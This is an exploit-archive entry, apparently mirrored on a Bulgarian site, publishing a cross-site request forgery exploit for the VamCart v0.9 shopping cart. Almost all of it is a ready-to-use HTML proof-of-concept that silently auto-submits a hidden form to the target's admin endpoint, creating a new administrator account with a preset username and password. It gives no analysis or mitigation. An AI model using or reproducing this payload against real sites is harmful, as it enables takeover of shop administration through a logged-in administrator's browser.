# Exploit Title: VamCart v0.9 CSRF Vulnerability # Date: 20/08/2012 # Author: DaOne # Software Link: http://vamcart.googlecode.com/files/vamcart.zip # Greetings to: LCA # CSRF Add Admin: <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[target]/users/admin_new/"> <input type="hidden" name="data[User][username]" value="webadmin"> <input type="hidden" name="data[User][email]" value="admin@email.com"/> <input type="hidden" name="data[User][password]" value="pass123"/> </form> </body> </html>Брой прочитания на тази страница: 764
VamCart v0.9 CSRF Vulnerability